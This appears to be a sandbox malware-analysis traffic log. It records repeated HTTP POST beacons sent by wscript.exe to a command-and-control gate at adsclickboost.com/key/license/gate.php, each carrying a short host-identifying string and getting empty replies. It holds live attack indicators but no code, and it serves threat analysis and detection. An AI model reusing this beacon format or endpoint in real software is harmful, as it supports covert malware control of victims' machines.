Mar 9, 2021 09:21:13.158740997 CET	1261	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d104207a2244d65213f2c2145505be9001615278072; expires=Thu, 08-Apr-21 08:21:12 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac7c01000064791e809000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aphFCQHxqA7Sm4MQQbyswm2R2Oup%2FsclM1%2BfOwb4%2B4fJcp6N2ozmvekNcar4l1fp0wJZ247N6OHqBEyZclsxmN1TtW7C9kDvZgiU0g7fQ3cE8w%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e37338f56479-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49751	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:14.123565912 CET	1263	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:14.123627901 CET	1263	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:14.483556032 CET	1279	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3abf821184cb8c387a568d439bbe61ea1615278074; expires=Thu, 08-Apr-21 08:21:14 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac812e000006e975316000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xPhw522p7Ct58KhZArmTwUhBRl2WW1CsbcLmydxC9L2PCVLR%2BYnSQcHlFKjP7dH1x1%2Bx2WQ7cot%2BJ%2Bh05WgLpe0P1al1nEwL05H%2BmiB3Y3TK5w%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e37b7f4d06e9-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49753	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:17.523437023 CET	4252	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:17.523457050 CET	4252	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:17.876846075 CET	4253	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d50470ce72f831a23ae4089d1a6d4e3411615278077; expires=Thu, 08-Apr-21 08:21:17 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac8e700000d7118095e000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=rAJCTPyt8hiGqvhxD59wN%2B1UVwdUU9JEoaPoa0nxK4YaYuY61n43UQOot1qVIanpI1MEC3kv%2B0n9HvGWzkUobXLhnC0Jej3Qo3zPhGVoNo2IKg%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e390bfe5d711-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49754	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:19.194303989 CET	4254	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:19.194411993 CET	4254	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:19.558442116 CET	4255	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d5f532974b72ded911fe743e0df34c2f31615278079; expires=Thu, 08-Apr-21 08:21:19 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac94f700004e1922933000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=H2%2Fx%2BuojPvrpA72NH%2BYBXFnshLStc5F2t7kY0FMPSt5dplAIXljc7dqZmCWrF5YEnwZEqdNpqCOUnh5apu4M0A5QQpPKc2Yn6maqSke%2BE2vMZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e39b2dfe4e19-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49756	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:22.077797890 CET	4857	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:22.077948093 CET	4857	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:22.417890072 CET	4861	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dc4dfce3cf0bff048bb1d6777ebd9591d1615278082; expires=Thu, 08-Apr-21 08:21:22 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7aca03b00000ea7a9801000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sBqJv0klTRpwpStctL6oHhT9cbnFsXXw3ujYKlWu2%2B0p%2Fk9O%2FfVIGqN4ZKzJwIVqitqLomdFIj1ysa%2BIc5bXHgxmYccUE%2F1x4Nh5MBYtHgVdrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e3ad2d450ea7-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49757	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:24.751147985 CET	4872	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:24.751737118 CET	4872	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:25.095045090 CET	4873	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d27c8de2e224bf1970991fcd2292e3c361615278084; expires=Thu, 08-Apr-21 08:21:24 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acaaae0000d7250cb96000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J%2Bf%2FB6MJF2PObJPJMmCUZPoGVuG8slE7%2F6ZejrIe9lDBWNdT98%2BNj82iITdJF0LRxsRH1DZ86wcIAAGSseqO94Urz1qIKNjRS2OaxMeMUX4A0A%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e3bdef8ed725-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49758	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:27.789314032 CET	4874	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:27.789541960 CET	4874	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:28.152148008 CET	4875	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d809beb21cff36cc5317e22952377cf171615278087; expires=Thu, 08-Apr-21 08:21:27 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acb693000006e5753fe000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aFOwFsSTW9tEjDspeaPPnm1lFB3x8%2BC%2FLWdtGUhKKPFigyy2Jcgg1Ag9QsTB%2BTBbvjoEuLf1c%2BjFgQQK6ErQ9Zl1Jx4Eum7C%2FN2W8Bgwzcr%2Bsg%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e3d0e93d06e5-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49759	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:29.056694984 CET	4876	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:29.057959080 CET	4876	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:29.415699005 CET	4877	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d44ffcdba31f773c8b357bc2aaa0c7afc1615278089; expires=Thu, 08-Apr-21 08:21:29 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acbb8500000026e1982000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DxaFxmIZ6MaE8%2F47%2BmAFUF%2FpAQioTCCy1IdN8fFGeFhGlW8e4W6Qt10qeNwAH4fhFwBUTJ%2FDR33BbGkuF2H6qlEuzzsKdL1sVhEp71u1eVd4ww%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e3d8d9f40026-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49760	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:31.758948088 CET	4878	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:31.758999109 CET	4878	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:32.117027044 CET	4879	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d82cf29173cc45ae038c76bb0e4ba32351615278091; expires=Thu, 08-Apr-21 08:21:31 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acc60c00004a5c722f0000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7yWOYsn7TR0UsUdtjrbUQvisYCcRwuOZgihWVgHJ0kuSF8QLQ6KaRD3zRN9Iq%2FJpGwD3S1WUHfI%2B8nHVy9nymvOYbVf6qahaCvVbBTuA5%2FopCQ%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e3e9ab854a5c-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49761	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:36.312733889 CET	4880	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:36.312772989 CET	4880	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:36.664208889 CET	4881	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d451882c7c8bd840d1e68d3f0a114d6a91615278096; expires=Thu, 08-Apr-21 08:21:36 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acd7d600004a6df2932000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=N8mcLp%2FGTMJ0Karh6ak3S%2F3lWyMnK%2B2kAIS0V9W3B%2F0asuyargvUDN9PEOT9oNVIAFU5WhnDA3%2FLvY%2BSru1dbtu9N3opPgTb%2BURQewmIchRNVA%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e406299a4a6d-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49723	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:32.358911037 CET	1100	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:32.358958960 CET	1100	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:32.690907001 CET	1101	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=ded21e4f05b71a168568179c8a11d345f1615278032; expires=Thu, 08-Apr-21 08:20:32 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abde0500002b29cfb1c000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ENwrwxHSOoRw7jWXSWfaWEJS6u6057%2FEvZ2s10LtTfbvhdAEBCtpZU8ufQKKWg5PXpJD%2Ft11GhE2TsfHjOKmMzffcU1LErO5WNKb6csLoAu2gw%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e2766c6c2b29-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49762	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:37.513902903 CET	4882	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:37.514997959 CET	4882	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:37.867126942 CET	4883	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d5660fa4f332d365999c40f21c12160111615278097; expires=Thu, 08-Apr-21 08:21:37 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acdc8700004eeb72a46000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cnPeYNSL1UKSYO4lKAiS5HTAE1Hd6dFiNRS6SOkfC13fLCW6Qbrz0097CTSaeSo3jBuOBDGQmAdpxO1Ni23gA9y2MAxWX%2B8W2D2ZOCoRRcvYyw%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e40daaa64eeb-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49763	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:37.989856958 CET	4884	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:37.989926100 CET	4884	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:38.325104952 CET	4884	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=df0290939799604635236841dd2ef79f51615278098; expires=Thu, 08-Apr-21 08:21:38 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acde6400004ec17688c000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aCSXYwZxC0SgRQbUYTpAZFIFWsP8REYWSAEE537liW%2BHhtzcTQ966lIrokdUdYixznKKtonQZJHJd1pgAyBIyCktVWRFqjSZ%2Fir3ytkSVfNX7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e410acd84ec1-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49765	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:41.110680103 CET	4894	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:41.110749960 CET	4894	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:41.461693048 CET	4895	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d33f93fb595301a952227703b7d1e1add1615278101; expires=Thu, 08-Apr-21 08:21:41 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acea94000016ee7826a000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tSaDzQzPxm35sBR2makps%2BzT8%2BEbnxXdI3pWoeNyr4QX%2FH8uCoR%2FDYQs4gveFTYtdyEtxialgAt0loyA9zsXuHVUbDtzHja%2F2zWHnh24xvPpeg%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e42428fd16ee-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49767	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:45.873584986 CET	4905	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:45.873632908 CET	4905	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:46.210813999 CET	4910	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1fbe26194ced9c0e47d4c5c8209fc3721615278105; expires=Thu, 08-Apr-21 08:21:45 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acfd2f00004ac82f18a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lxKNU31a49p1AVfV%2BheXA6%2B8UuEwCtK4DIWhGvzxpqEGJj7q2Qtz1WlrG9lE%2FBJ7xh8BF6OwXW0WaYza3PYZtZkEGVh19vngyM54zM5erymsng%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e441eb764ac8-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49768	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:46.011737108 CET	4907	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:46.011795998 CET	4907	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:46.367882013 CET	4910	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d8a1bb120c611d5ae7e617ec6cf1492411615278106; expires=Thu, 08-Apr-21 08:21:46 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7acfdbf0000406604b31000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2Fw%2Fd6L9i7mZuFvAi5YE1RQtc6bD1%2B2GHdhiitCMTrwETN1UBiAnmnoh8YgCZklD9EpW8eEEXVaUIdPv5wAIhd%2FJbw5oyMF1hkMrxgeofFlBSLA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e442ccd94066-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49769	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:46.203630924 CET	4909	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
